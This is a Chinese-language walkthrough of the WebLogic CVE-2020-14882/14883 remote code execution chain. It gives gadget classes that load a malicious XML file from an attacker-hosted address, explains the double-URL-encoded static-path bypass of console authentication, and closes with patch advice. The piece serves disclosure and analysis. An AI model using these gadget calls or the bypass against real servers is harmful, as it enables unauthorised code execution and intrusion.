任意代码执行复现:
利用上述未授权访问CVE-2020-14882结合CVE-2020-14883
利用方式(一):
通过:
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext,这种方法最早在CVE-2019-2725被提出,该方法通用于各版本weblogic。
这里首先需要我们构造一个恶意的xml文件,如这里我们自己搭建的http://10.211.55.2:9999/rce-win.xml。
其次需要被攻击的weblogic能够访问我们的恶意xml。
其他gadget:
com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext(“http://IP/poc.xml”)
利用方式(二):
通过com.tangosol.coherence.mvel2.sh.ShellSession,但此利用方法只能在Weblogic 12.2.1及以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。
我们可以看到在当前10.3.6版本会提示
其他exp:
比如回显的
调试分析:
首先,通过静态资源文件绕过路径权限的校验。之后weblogic会对提交的url进行两次url解码。最后会将handle中的参数传入HandleFactory执行任意代码。
从绕过路径权限的校验开始。首先weblogic的请求会经过weblogic.servlet.internal.WebAppServletContext#execute处理,这里会调用securedExecute()
weblogic.servlet.internal.WebAppServletContext#doSecuredExecute
在这里调用checkAccess进行权限的检查
这里跟进weblogic.servlet.security.internal.WebAppSecurityWLS#getConstraint()
当我们的relURI为/console.portal时,rcForAllMethods不为null,rcForOneMethod为null,所以返回了rcForAllMethods。而对应静态资源就不会有限制和校验
如果使用console/images/console.portal则会继续判断resourceConstraint及后续的isAuthorized,并进入weblogic.servlet.security.internal.ChainedSecurityModule#checkAccess
所以当我们这里使用静态资源路径时,unrestrict值就为true
这里如果解码后的url里没有;,那么就会继续调用super.service
最终不管哪种请求都会来到doPost,并在这里调用createUIContext
随后进入getTree又进行了一次解码,此时requestPattern就变成/css/../console.portal
这里会逐个检查参数中是否有handle并将handle的参数内容提取出来返回
此时传进来的handleStr会在这里被拆成两部分,一个作为被实例化的类,另一个作为该类的构造函数参数及实例化,比如java.lang.String(‘aaaa’),被拆分成java.lang.String和aaaa
比如当我们构造了恶意gadget后就变成了这样,随后即可触发rce
三、修复
目前Oracle官方已发布了最新针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。
Oracle官方补丁需要用户持有正版软件的许可账 ,使用该账 登陆https://support.oracle.com后,可以下载最新补丁。
参考链接:https://www.oracle.com/security-alerts/cpuoct2020.html
在旧版补丁中,使用黑名单过滤,可使用大小写绕过,请更新最新版的补丁,或者如无使用必要可选择关闭console。
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!